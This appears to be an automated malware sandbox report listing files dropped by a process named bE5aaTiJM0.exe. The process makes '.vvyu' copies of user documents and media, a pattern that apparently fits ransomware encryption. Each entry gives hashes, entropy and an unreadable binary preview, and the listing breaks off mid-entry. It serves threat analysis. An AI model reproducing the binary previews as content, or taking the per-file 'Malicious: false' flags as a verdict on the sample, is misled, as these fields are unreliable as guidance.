SHA-256:	9A33CD910DAE011F289454ED16594A50C369018D1EC6049BEB1A0A6F7C8EF31D
SHA-512:	C588A73FB1273330FBA1ACA1046910883FF5EE1323D0F8EAC143EA002709962B2F646C398B0C4CBACBAA36E2E67B0C9146BF9548648106E246729F4B3E0275F6
Malicious:	false
Preview:	DUUDT. ......h/....$.p.u3......ax.N.3.OP_)yw#.`.....3eF..+.I...'...a.z.>".7~.O.K&fUU.......rQ...J.H.<....n..l.&a_...`.n.ekx.\....2....)..1}..-....6...t..U...(...T.....$}...B\|..u..g.}.......o.-.^<..\|.]...V.hqR.c....?....,.I...8!eFu..1.X..m..^`.>\.H.x.N3......'...9..}X.....rT.Z..F...n.....7..O...L..b.P.e. .......N......._.H.....'..n.p...O.6e..,.X<@S......-.&PJV..Q....3.......a.O..K.........z... ;D_..s.Rj.\|n.B......l!....R.......6# ...w........k0K..tc....x...v.....?.{h...E...w......U...@A...r.4.......q+C.u.3.....H......@..w).._I.L7/\.CF...e..G.(k..Ki....m#...ef.>'.iR.[....5D....@.%A{...<.........<%.8jGd.`...q>m..8.<..bG..sv..."U.,.....M9X...R.M.?..T.../..(..M.....Z.g..+.33....J...v.........}....{5...J#.S.<..?.(..^......b3..s.c.Y.i..P......3K.Z."O..09C.D....@.xi.1....f.....L....+..hv.a._.R.G.+0.-w..........n.d.....-.....&.P....+C........%0.O.rZw....Q..x....s..$.J/.......a..f.G...n/...$.9.Oo7.J......7\.d.......N....I.i.pc.X

C:\Users\user\Documents\EEGWXUHVUG\DUUDTUBZFW.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850364873561436
Encrypted:	false
SSDEEP:	24:nMCBdXb57BUHc/fnrkzwYgBI+etlgfyQe0Cnr2AZl1TCWXGSrBjjjqFV8sbD:nMCBdLpBUXcYgBIXUqmCr2AZPCWWStt+
MD5:	4F6796D8DE4A2640D589FA86DAAF6BF1
SHA1:	13AF9844AD3D7D58F8A56DBA5702E7EFAA9D73B3
SHA-256:	9A33CD910DAE011F289454ED16594A50C369018D1EC6049BEB1A0A6F7C8EF31D
SHA-512:	C588A73FB1273330FBA1ACA1046910883FF5EE1323D0F8EAC143EA002709962B2F646C398B0C4CBACBAA36E2E67B0C9146BF9548648106E246729F4B3E0275F6
Malicious:	false
Preview:	DUUDT. ......h/....$.p.u3......ax.N.3.OP_)yw#.`.....3eF..+.I...'...a.z.>".7~.O.K&fUU.......rQ...J.H.<....n..l.&a_...`.n.ekx.\....2....)..1}..-....6...t..U...(...T.....$}...B\|..u..g.}.......o.-.^<..\|.]...V.hqR.c....?....,.I...8!eFu..1.X..m..^`.>\.H.x.N3......'...9..}X.....rT.Z..F...n.....7..O...L..b.P.e. .......N......._.H.....'..n.p...O.6e..,.X<@S......-.&PJV..Q....3.......a.O..K.........z... ;D_..s.Rj.\|n.B......l!....R.......6# ...w........k0K..tc....x...v.....?.{h...E...w......U...@A...r.4.......q+C.u.3.....H......@..w).._I.L7/\.CF...e..G.(k..Ki....m#...ef.>'.iR.[....5D....@.%A{...<.........<%.8jGd.`...q>m..8.<..bG..sv..."U.,.....M9X...R.M.?..T.../..(..M.....Z.g..+.33....J...v.........}....{5...J#.S.<..?.(..^......b3..s.c.Y.i..P......3K.Z."O..09C.D....@.xi.1....f.....L....+..hv.a._.R.G.+0.-w..........n.d.....-.....&.P....+C........%0.O.rZw....Q..x....s..$.J/.......a..f.G...n/...$.9.Oo7.J......7\.d.......N....I.i.pc.X

C:\Users\user\Documents\EEGWXUHVUG\EEGWXUHVUG.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8360179769573755
Encrypted:	false
SSDEEP:	24:4dWHXJ1Gn2PXKudOZaDroaBo3Wb2ULhlFEcVk+7tITWRuz7sbD:4dWHXJ1G2PXKM2aXoaBom6ULhlFoW8zi
MD5:	7F2108CA978CED05A14914533E1AEA0D
SHA1:	86F83C454137FE8BE3B5F5AED5D36843B41B39AA
SHA-256:	8D05510AC895C12C84AD46CA03A355DEE06E4E36D96EB346AF73C07F02A3432D
SHA-512:	34114293884FA06E5CD23195638282F36F5C00AD52249383888946017D53E12C274146186A21A0581ED3D39BD496F5AF2620DEBE590B5A4FA7B98465599601F8
Malicious:	false
Preview:	EEGWXM...h.. ...-K....{.....?........yuY.......\....c...D..s..o.hh..o'.;..C......K.......L.@..~.?..W.\'.$W...e...K..#.....E...........YY.ehO.....YYF........P.GK.!'..R...i.[...B....X6..P...y.yv.g4........].4...l......W..J..?j.&...3,!a.rm.>m!A.v./F.m!...r.Ay].so..`9..p.a[..L...T...+.........i..YB.~.n"v...K......>..R}......1+..l.m....H._.g..i3.`.:!h;..d..1.>......8......_.%.-g....%.o....f.....}.J.8....I....e&..F.F....:OwiHR.F>.....9.q.....m..dJ..X..7_.%=..)).O......q..._TW...,W.F.V4'y.R...\|6.x........tH!I.....D....!vS.N....\|w.D.t..._."y.7.../..Y..].`$.....%.ml..._ .5.....M)..x._....P.8.U....=eN6J;08O.......W'X.d.9..aJ>.}$...$.6M.N=0.=..b.>...,..h.8..0u...__\...9........7.....~....idy...;%..... 1+A...G.DE..d....?..\.......yy..J.Ps.N.2...^.~.?.....b}.....4yD....d^..27.c...=..yw........6.._.....n..sZ.!.8'X....6..\|j.#3K....T'..o..g.....dG..k......#9r\?..{...'.M..M}...Nl.......j..$.7.}...i..(VT.C^q..v7.vC.e.6...a.&.(G.!.......2M.Vi..F...+....q..>\

C:\Users\user\Documents\EEGWXUHVUG\EEGWXUHVUG.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8360179769573755
Encrypted:	false
SSDEEP:	24:4dWHXJ1Gn2PXKudOZaDroaBo3Wb2ULhlFEcVk+7tITWRuz7sbD:4dWHXJ1G2PXKM2aXoaBom6ULhlFoW8zi
MD5:	7F2108CA978CED05A14914533E1AEA0D
SHA1:	86F83C454137FE8BE3B5F5AED5D36843B41B39AA
SHA-256:	8D05510AC895C12C84AD46CA03A355DEE06E4E36D96EB346AF73C07F02A3432D
SHA-512:	34114293884FA06E5CD23195638282F36F5C00AD52249383888946017D53E12C274146186A21A0581ED3D39BD496F5AF2620DEBE590B5A4FA7B98465599601F8
Malicious:	false
Preview:	EEGWXM...h.. ...-K....{.....?........yuY.......\....c...D..s..o.hh..o'.;..C......K.......L.@..~.?..W.\'.$W...e...K..#.....E...........YY.ehO.....YYF........P.GK.!'..R...i.[...B....X6..P...y.yv.g4........].4...l......W..J..?j.&...3,!a.rm.>m!A.v./F.m!...r.Ay].so..`9..p.a[..L...T...+.........i..YB.~.n"v...K......>..R}......1+..l.m....H._.g..i3.`.:!h;..d..1.>......8......_.%.-g....%.o....f.....}.J.8....I....e&..F.F....:OwiHR.F>.....9.q.....m..dJ..X..7_.%=..)).O......q..._TW...,W.F.V4'y.R...\|6.x........tH!I.....D....!vS.N....\|w.D.t..._."y.7.../..Y..].`$.....%.ml..._ .5.....M)..x._....P.8.U....=eN6J;08O.......W'X.d.9..aJ>.}$...$.6M.N=0.=..b.>...,..h.8..0u...__\...9........7.....~....idy...;%..... 1+A...G.DE..d....?..\.......yy..J.Ps.N.2...^.~.?.....b}.....4yD....d^..27.c...=..yw........6.._.....n..sZ.!.8'X....6..\|j.#3K....T'..o..g.....dG..k......#9r\?..{...'.M..M}...Nl.......j..$.7.}...i..(VT.C^q..v7.vC.e.6...a.&.(G.!.......2M.Vi..F...+....q..>\

C:\Users\user\Documents\EEGWXUHVUG\EFOYFBOLXA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.798611307416927
Encrypted:	false
SSDEEP:	24:Kn9mbbS1k8enDWR4DgeFodk7nGmpke51hHZSokek2gNaMFXZC7yWsbD:m4Yk8env6k7nPke51h5Fke2NtXZC7yW+
MD5:	9489888085A4FD27CF9BF9387EAC57AE
SHA1:	83F93F3910CC978A6144268DD8D1DB54309FFCFF
SHA-256:	19117B7F9EB0678D683925685D34FE852080B13A8E34BB28BF3D922DEF20D157
SHA-512:	AA0AA0A6D56F6D680FBDA3EBAF6BF245D4E0D999C551FDA8A4AF8F6F0D1C2D6A9A1F27746107EAEBBE3149A67D03E96FC78F8E5661E7258FC77682E5B61E6224
Malicious:	false
Preview:	EFOYFP1.......a&..7.V...d......!+..J....\&L.......X........^=4.C..>j...?..EA..G....../..m....[......P.v.....-.P..-./....... ..0.3W...%....]I...T...1W.#S.....p.4.O[`..%3.=.9.u..N....U.mMN#".\|.\n.[\|{.P..Z..1..&......p....V6yX....."Hg..g..+V.Y.....9....;]..~.OJF....S}..?"1...3...".Eb.!A.~E..B2..K..........s.+......=.6.#S\..v.P%.}J...m..nV.Eq...-...j......30od.1`..oG.._.2.dN.9..K....o.F%.~..G#H.g.D4..m...m..a.>N.e....\|...+..I".....Z..J.q..`.].}M.E.p...$.G.....B.7..N.>..bF.B..o.k9$....&.WS'.../...\|......y.B..9....d.S W....Nd...,nJ.J.j]....k..!.P..d.\...i..O..=....{~.".U..n........Y..p.cc..@.......=...1..H.o.<.E..p].........w:.A.'...2]mn....%.?..4..GO?.....m.e.d..g...m..........jh..D..JCq..6.r...;...7.]$w.-.\..$HM+ccI/...:#.. ..6.).0..........>B...].Nm...m.S.S.`....\|.{....".'\.....`..g....b...[..-......^.d.H.."..]....@..`z....t...IRT....-...!oH..(...nv{.<}^...$,`S..b.~..n.d.F...\!.7[.....n...._h:8G...W.....A...#...... j.<:..[..T.'g.u

C:\Users\user\Documents\EEGWXUHVUG\EFOYFBOLXA.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.798611307416927
Encrypted:	false
SSDEEP:	24:Kn9mbbS1k8enDWR4DgeFodk7nGmpke51hHZSokek2gNaMFXZC7yWsbD:m4Yk8env6k7nPke51h5Fke2NtXZC7yW+
MD5:	9489888085A4FD27CF9BF9387EAC57AE
SHA1:	83F93F3910CC978A6144268DD8D1DB54309FFCFF
SHA-256:	19117B7F9EB0678D683925685D34FE852080B13A8E34BB28BF3D922DEF20D157
SHA-512:	AA0AA0A6D56F6D680FBDA3EBAF6BF245D4E0D999C551FDA8A4AF8F6F0D1C2D6A9A1F27746107EAEBBE3149A67D03E96FC78F8E5661E7258FC77682E5B61E6224
Malicious:	false
Preview:	EFOYFP1.......a&..7.V...d......!+..J....\&L.......X........^=4.C..>j...?..EA..G....../..m....[......P.v.....-.P..-./....... ..0.3W...%....]I...T...1W.#S.....p.4.O[`..%3.=.9.u..N....U.mMN#".\|.\n.[\|{.P..Z..1..&......p....V6yX....."Hg..g..+V.Y.....9....;]..~.OJF....S}..?"1...3...".Eb.!A.~E..B2..K..........s.+......=.6.#S\..v.P%.}J...m..nV.Eq...-...j......30od.1`..oG.._.2.dN.9..K....o.F%.~..G#H.g.D4..m...m..a.>N.e....\|...+..I".....Z..J.q..`.].}M.E.p...$.G.....B.7..N.>..bF.B..o.k9$....&.WS'.../...\|......y.B..9....d.S W....Nd...,nJ.J.j]....k..!.P..d.\...i..O..=....{~.".U..n........Y..p.cc..@.......=...1..H.o.<.E..p].........w:.A.'...2]mn....%.?..4..GO?.....m.e.d..g...m..........jh..D..JCq..6.r...;...7.]$w.-.\..$HM+ccI/...:#.. ..6.).0..........>B...].Nm...m.S.S.`....\|.{....".'\.....`..g....b...[..-......^.d.H.."..]....@..`z....t...IRT....-...!oH..(...nv{.<}^...$,`S..b.~..n.d.F...\!.7[.....n...._h:8G...W.....A...#...... j.<:..[..T.'g.u

C:\Users\user\Documents\EEGWXUHVUG\EWZCVGNOWT.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846936260113352
Encrypted:	false
SSDEEP:	24:9v5/QuA/TtGr6XC+LPcrYKBzqP8vHXpMIK2DheyEs5P6UiFyUU4y5E72zSqHMxU0:9v5rAo2XRLErqPo3pY2/RfigUU4TyS8+
MD5:	F2ED4A903E829ACA6503EC3666AAA367
SHA1:	463907D627520D07E39F525293A17B0F72467E74
SHA-256:	582219BF2F915D3408C52B5E73841307520DE3D9FCAEACF31065BF7D65E9A855
SHA-512:	643506C58D252F7AD17E3470B0BEF946991FDB711018BA978BDA833375F65A7D182838E7DEA366D8D51E5D8A525A3C479ED75A306E21601854B96C2A05D7C1E4
Malicious:	false
Preview:	EWZCV-.....8...[d.jlN....u...\|Y..6..Ej..H...U(.r..1.M.f.._.?r..l..6...+.U.>..i...c.-.HT0...{+.U.....,.....5.l4..B..jW..31.R.%slhz..@..i..i..v.,BB...$./%.....Q5.u.O...8.Ib....(r.......S........'..F.iX..C.u..C.....Y3...}..0.O..b.\|q.)..(_...A$.f..S.9.....fa..r..!~_.4^.5s'...'..M$D#H#..n...'.z...0.......UsY..Y.k).z"...j..sE...T4...@..q..PBc...&...E..S.).N....$..(..n..........`..."c8..4.Hb.)..r6bN.....[A.(.. e"`.nnb..$1..u\.'.#WM...../.RiRPB...;.M.&:%..l....O.el.....U.\..Rse..f....^.=.^..Mv~.N....G.z..".l9.....J....r...\|..8..a..;_....~.......n.9..R..._.M<..9...@..W...)<.../....`.^.[/.'...#g...qA.......H.......2...B..7..-B.q.f"M-83.u....j..W.c...P..\|..&3.E./ o.&L..\.3tTx....2d1.C..]..v.^6M.K..L.`1,..........m..(Y6.D....k..3Z..9}....u......j\|...p.>..8..^L.-.....U(..+.:..x.9...+....73.Gz.l#..z.e.X_?wO9..5.;... q .....S.)..s.8.s.G.g....&.......X..H.\..O...K.....R....L.i.?...5...t.(...$<a:.]....,...#.2.".U....CF..O@l&....1.]X.....`m%..m

C:\Users\user\Documents\EEGWXUHVUG\EWZCVGNOWT.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846936260113352
Encrypted:	false
SSDEEP:	24:9v5/QuA/TtGr6XC+LPcrYKBzqP8vHXpMIK2DheyEs5P6UiFyUU4y5E72zSqHMxU0:9v5rAo2XRLErqPo3pY2/RfigUU4TyS8+
MD5:	F2ED4A903E829ACA6503EC3666AAA367
SHA1:	463907D627520D07E39F525293A17B0F72467E74
SHA-256:	582219BF2F915D3408C52B5E73841307520DE3D9FCAEACF31065BF7D65E9A855
SHA-512:	643506C58D252F7AD17E3470B0BEF946991FDB711018BA978BDA833375F65A7D182838E7DEA366D8D51E5D8A525A3C479ED75A306E21601854B96C2A05D7C1E4
Malicious:	false
Preview:	EWZCV-.....8...[d.jlN....u...\|Y..6..Ej..H...U(.r..1.M.f.._.?r..l..6...+.U.>..i...c.-.HT0...{+.U.....,.....5.l4..B..jW..31.R.%slhz..@..i..i..v.,BB...$./%.....Q5.u.O...8.Ib....(r.......S........'..F.iX..C.u..C.....Y3...}..0.O..b.\|q.)..(_...A$.f..S.9.....fa..r..!~_.4^.5s'...'..M$D#H#..n...'.z...0.......UsY..Y.k).z"...j..sE...T4...@..q..PBc...&...E..S.).N....$..(..n..........`..."c8..4.Hb.)..r6bN.....[A.(.. e"`.nnb..$1..u\.'.#WM...../.RiRPB...;.M.&:%..l....O.el.....U.\..Rse..f....^.=.^..Mv~.N....G.z..".l9.....J....r...\|..8..a..;_....~.......n.9..R..._.M<..9...@..W...)<.../....`.^.[/.'...#g...qA.......H.......2...B..7..-B.q.f"M-83.u....j..W.c...P..\|..&3.E./ o.&L..\.3tTx....2d1.C..]..v.^6M.K..L.`1,..........m..(Y6.D....k..3Z..9}....u......j\|...p.>..8..^L.-.....U(..+.:..x.9...+....73.Gz.l#..z.e.X_?wO9..5.;... q .....S.)..s.8.s.G.g....&.......X..H.\..O...K.....R....L.i.?...5...t.(...$<a:.]....,...#.2.".U....CF..O@l&....1.]X.....`m%..m

C:\Users\user\Documents\EEGWXUHVUG\ZGGKNSUKOP.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852721396092956
Encrypted:	false
SSDEEP:	24:dPJSqm6yuFdwmTb8gzasj5rGWJ/x0Z7Y2YRQEDpnVD46PPmAD8sbD:dhAruvdTbh4Wr47Y2oQEl5GmD
MD5:	CEB5C90FCFABE05B73D48C5D66BE03D3
SHA1:	22C1867A0EBD08DE2ACA87A006FF6DFD60FB0E0F
SHA-256:	BE4FB8F88170EFBC10AE819244BB4AFA67400573FA39FCE81D8ABFCDA7245D4B
SHA-512:	00D29CEFD18E06EB3CC502DD3701A10F4DA5530529FF1766B4E61BA7FB125671778FD7391F5781DC48D0C774803E3D4F0E1A267F1928D5751674987DA30A3BBE
Malicious:	false
Preview:	ZGGKN..5......jW....../.u......<)..@..e...Z.F.?.[t.-....=..T.H.KD..A.......b.<..;(a;L.....-m...Y..BL.@....x...tW....VAp..q.........i.....P.p..Z....+7.BM.;....@g...........M.U.........xP..7.t-..c'..9.u......uw..qM}w.......~K...\.7._TO.+.U.C....}.....d}.~.0+.'.#.Q.R.2.........eh..)~v.........[.^.W."0..\|.!..Vy..8..\..%..,..JD..._Y......6..n....2@_..S.7 ...<..`6~{........2.E&2f.A......Tu........"/n.a.....Y...r;.."sH......S.h...+.;.R.^...k\..D..i..Pn:YDN..;....GP.xR...........3-4A.......y.]....;2.....k.4.M........Q....M....._....ymP..~G...?X.`.K...J.w..rU....../O_.-....g.as....Mx..o8.V.5......YVE..MZ..Lr....!O...E~I....n.^.?..........\...... .@...3..E.z.W_P..>..nM...D.3..1'........../....`...[.......2..pA..:.#sR...e..k..O..#.O.$.J...`.[..GdDg...1...j%.=u.vA6.`<Sg.M)..P...a..:d.....\o..oZG.)1.LxE..q.@.sv.N.. .{..9.\|.5.....=..l&.lX~x..E.=...g.....+..M.o.d.2".5/...E......tW.&.+..gQ.......FC,y\|...e........$#x......Wo........`...}ixn&.z..2.v

C:\Users\user\Documents\EEGWXUHVUG\ZGGKNSUKOP.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852721396092956
Encrypted:	false
SSDEEP:	24:dPJSqm6yuFdwmTb8gzasj5rGWJ/x0Z7Y2YRQEDpnVD46PPmAD8sbD:dhAruvdTbh4Wr47Y2oQEl5GmD
MD5:	CEB5C90FCFABE05B73D48C5D66BE03D3
SHA1:	22C1867A0EBD08DE2ACA87A006FF6DFD60FB0E0F
SHA-256:	BE4FB8F88170EFBC10AE819244BB4AFA67400573FA39FCE81D8ABFCDA7245D4B
SHA-512:	00D29CEFD18E06EB3CC502DD3701A10F4DA5530529FF1766B4E61BA7FB125671778FD7391F5781DC48D0C774803E3D4F0E1A267F1928D5751674987DA30A3BBE
Malicious:	false
Preview:	ZGGKN..5......jW....../.u......<)..@..e...Z.F.?.[t.-....=..T.H.KD..A.......b.<..;(a;L.....-m...Y..BL.@....x...tW....VAp..q.........i.....P.p..Z....+7.BM.;....@g...........M.U.........xP..7.t-..c'..9.u......uw..qM}w.......~K...\.7._TO.+.U.C....}.....d}.~.0+.'.#.Q.R.2.........eh..)~v.........[.^.W."0..\|.!..Vy..8..\..%..,..JD..._Y......6..n....2@_..S.7 ...<..`6~{........2.E&2f.A......Tu........"/n.a.....Y...r;.."sH......S.h...+.;.R.^...k\..D..i..Pn:YDN..;....GP.xR...........3-4A.......y.]....;2.....k.4.M........Q....M....._....ymP..~G...?X.`.K...J.w..rU....../O_.-....g.as....Mx..o8.V.5......YVE..MZ..Lr....!O...E~I....n.^.?..........\...... .@...3..E.z.W_P..>..nM...D.3..1'........../....`...[.......2..pA..:.#sR...e..k..O..#.O.$.J...`.[..GdDg...1...j%.=u.vA6.`<Sg.M)..P...a..:d.....\o..oZG.)1.LxE..q.@.sv.N.. .{..9.\|.5.....=..l&.lX~x..E.=...g.....+..M.o.d.2".5/...E......tW.&.+..gQ.......FC,y\|...e........$#x......Wo........`...}ixn&.z..2.v

C:\Users\user\Documents\EFOYFBOLXA.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850274278350941
Encrypted:	false
SSDEEP:	24:b5Mmk19CaCxrdw8fb9jLXRUX3H3qDzGmGqsFnoVUNFCXziFtOZfObZ0+A21rw9CD:AXpCf/f1RMH34zqPnoBXzeOZWKh21JgK
MD5:	6E13AF62BABB13B82FD199CA9DD61AAD
SHA1:	895D7DF4AA015DECA52C9E726354ABE041BFCBD2
SHA-256:	AD65EA1B7BD266265E3DA1B5BEEA64ECF9A82F472BDEF90D8FED630432B0D68D
SHA-512:	C0280817084993503A7D50537D7DE716BF2C3EABC3F5896B8181AE0D3C1EC32211B215651A0B15139270DC9CABBBC1F60AD281BD832A48F9E310CDB4D4A7BDE1
Malicious:	false
Preview:	EFOYF`..Y.....].{..Qr,.......m.......7GL...K[9G.:......G%........u.H!.jY...a..Tl.\.k......C...+\r.....<l\}'I!...ru....h....:"A.x....C..a.......v......I.1....0....XZo..........F.1.<.He.r.',.b..@).z......'.:.m.......E\.?......P....o.98uV.....^3).C.....{>.a..:_......F....Vqc.....H....#Q{.2...8xD.18..5h2.....W.....f!Q..~...g[jN.x,,....m.2q.H-m.q.Z.bH.d..."......knU..m%..M.GW....p...;;B.4....P..dF$...jp..6%q.?.u.c....D...W...k'...^.+F..}.0o.Nv..g{o..A..p..k.`.=/.....A...b...W.::j.K...t.......GC2.e...=.0.M(.....Z....V..k)...$.A..U.h.T_hYy.(....>iN.0YxTg.-.....5..).$.@..H.w.r=..l:D..s.Lq.......'P.Z6...e@;B.E..@.6$pV...g..[G."...e&.V..xlL..1:i...0.!6..................y.p.>;.P9\/\|...,.J.}:..{k.q....'7....?..(................R.9H].x(....va[.A.8fi..Q....C...Y.]o..7.........?...vi[..{.............b-....a.`F..RL.b..@t-P..6D.#o^.S.R..#bgN....Z.+..66.`..r@....8..UubP9m.%@=..Ykb...1.....Q..,..0....s.c.c.=....q._..s,.u...38,3.._...R.#9....1.}...2.J.4Q.o.

C:\Users\user\Documents\EFOYFBOLXA.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850274278350941
Encrypted:	false
SSDEEP:	24:b5Mmk19CaCxrdw8fb9jLXRUX3H3qDzGmGqsFnoVUNFCXziFtOZfObZ0+A21rw9CD:AXpCf/f1RMH34zqPnoBXzeOZWKh21JgK
MD5:	6E13AF62BABB13B82FD199CA9DD61AAD
SHA1:	895D7DF4AA015DECA52C9E726354ABE041BFCBD2
SHA-256:	AD65EA1B7BD266265E3DA1B5BEEA64ECF9A82F472BDEF90D8FED630432B0D68D
SHA-512:	C0280817084993503A7D50537D7DE716BF2C3EABC3F5896B8181AE0D3C1EC32211B215651A0B15139270DC9CABBBC1F60AD281BD832A48F9E310CDB4D4A7BDE1
Malicious:	false
Preview:	EFOYF`..Y.....].{..Qr,.......m.......7GL...K[9G.:......G%........u.H!.jY...a..Tl.\.k......C...+\r.....<l\}'I!...ru....h....:"A.x....C..a.......v......I.1....0....XZo..........F.1.<.He.r.',.b..@).z......'.:.m.......E\.?......P....o.98uV.....^3).C.....{>.a..:_......F....Vqc.....H....#Q{.2...8xD.18..5h2.....W.....f!Q..~...g[jN.x,,....m.2q.H-m.q.Z.bH.d..."......knU..m%..M.GW....p...;;B.4....P..dF$...jp..6%q.?.u.c....D...W...k'...^.+F..}.0o.Nv..g{o..A..p..k.`.=/.....A...b...W.::j.K...t.......GC2.e...=.0.M(.....Z....V..k)...$.A..U.h.T_hYy.(....>iN.0YxTg.-.....5..).$.@..H.w.r=..l:D..s.Lq.......'P.Z6...e@;B.E..@.6$pV...g..[G."...e&.V..xlL..1:i...0.!6..................y.p.>;.P9\/\|...,.J.}:..{k.q....'7....?..(................R.9H].x(....va[.A.8fi..Q....C...Y.]o..7.........?...vi[..{.............b-....a.`F..RL.b..@t-P..6D.#o^.S.R..#bgN....Z.+..66.`..r@....8..UubP9m.%@=..Ykb...1.....Q..,..0....s.c.c.=....q._..s,.u...38,3.._...R.#9....1.}...2.J.4Q.o.

C:\Users\user\Documents\EFOYFBOLXA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84328049825651
Encrypted:	false
SSDEEP:	24:778Q74kSgrnG25+Nylveh8rJLyThI0U3EWkhmdueDKtNdRq7OsbD:n8Q74YC6EVglyC3WYuEKtNdRq7OmD
MD5:	ACF36F96B2FF99EAAC05D61849926572
SHA1:	274A54CE8F89B00D173C571FFDA660B6AF8F2E0B
SHA-256:	A3363B6EB746EE188433831C7678981FAD3E798491AA7C8F4A1A65F518DE3379
SHA-512:	C00144DC09717FFC5EDF2F60A89AED16B3A50B936B43703186208C1BD8AACDFCB0096E0483ABB1ADF381A9D0B5CDDC15610CB390AEA1CE9ACB8045EC9A87D97B
Malicious:	false
Preview:	EFOYFw...rPv.=.....HT.5sq:..!e.....:e#.7...'...,.%..hu67..Q...%....].........a.j=..iDbs..2h...9.%..r.......N.F....Mi....rC......>..#E.../...z..&l?ajE.x.U.i........Z~..>....B...J.^h...g....F.Da&.B......G.....V.<.;...a!...7..lY.!.....Q/n...A.M.FL..d..^.j..J..&.d.1..........D...........z..y(bW..eX...KK.d...."..[.K..f`..Y....9.VRX.i.D.V.+.6.......b..+.....!.>.........t:.Ve...94...P.e....j}..}.......$.l.UTe7..)....5..D..I...o-.U."...<R............p.i..2.nA.8 ..OH...D........MGJ&.$t#q9..s.....$....KV=....JHg.Q...2..3j..8..M5.\|...G.I..=.u..=....X.h..\.DN.O..Tk(.E .....6.".l..9..r@........}....vm.~.....>\.qH?.~i.0`.Q...<....2...pO....?.u..#..#....._.......o.....y..<.R...^.ifEG."}..qf..`...1e.)..7......I.3........]9.w}...V...P.2..#..AV(B.D&=.).F....E.n2...]\<.[i.#U.......i...(....u..J.s......:.9........E.'....1...3.qs.....+..."d\|.....2.(.z.zx.&....T.6...G..i.&L\>*.K6...w...z\|.gE.H..R..v...N=5..#hW.f.. !V....=(..sK_...R=...{..e..U6......f.)B9)

C:\Users\user\Documents\EFOYFBOLXA.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84328049825651
Encrypted:	false
SSDEEP:	24:778Q74kSgrnG25+Nylveh8rJLyThI0U3EWkhmdueDKtNdRq7OsbD:n8Q74YC6EVglyC3WYuEKtNdRq7OmD
MD5:	ACF36F96B2FF99EAAC05D61849926572
SHA1:	274A54CE8F89B00D173C571FFDA660B6AF8F2E0B
SHA-256:	A3363B6EB746EE188433831C7678981FAD3E798491AA7C8F4A1A65F518DE3379
SHA-512:	C00144DC09717FFC5EDF2F60A89AED16B3A50B936B43703186208C1BD8AACDFCB0096E0483ABB1ADF381A9D0B5CDDC15610CB390AEA1CE9ACB8045EC9A87D97B
Malicious:	false
Preview:	EFOYFw...rPv.=.....HT.5sq:..!e.....:e#.7...'...,.%..hu67..Q...%....].........a.j=..iDbs..2h...9.%..r.......N.F....Mi....rC......>..#E.../...z..&l?ajE.x.U.i........Z~..>....B...J.^h...g....F.Da&.B......G.....V.<.;...a!...7..lY.!.....Q/n...A.M.FL..d..^.j..J..&.d.1..........D...........z..y(bW..eX...KK.d...."..[.K..f`..Y....9.VRX.i.D.V.+.6.......b..+.....!.>.........t:.Ve...94...P.e....j}..}.......$.l.UTe7..)....5..D..I...o-.U."...<R............p.i..2.nA.8 ..OH...D........MGJ&.$t#q9..s.....$....KV=....JHg.Q...2..3j..8..M5.\|...G.I..=.u..=....X.h..\.DN.O..Tk(.E .....6.".l..9..r@........}....vm.~.....>\.qH?.~i.0`.Q...<....2...pO....?.u..#..#....._.......o.....y..<.R...^.ifEG."}..qf..`...1e.)..7......I.3........]9.w}...V...P.2..#..AV(B.D&=.).F....E.n2...]\<.[i.#U.......i...(....u..J.s......:.9........E.'....1...3.qs.....+..."d\|.....2.(.z.zx.&....T.6...G..i.&L\>*.K6...w...z\|.gE.H..R..v...N=5..#hW.f.. !V....=(..sK_...R=...{..e..U6......f.)B9)

C:\Users\user\Documents\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
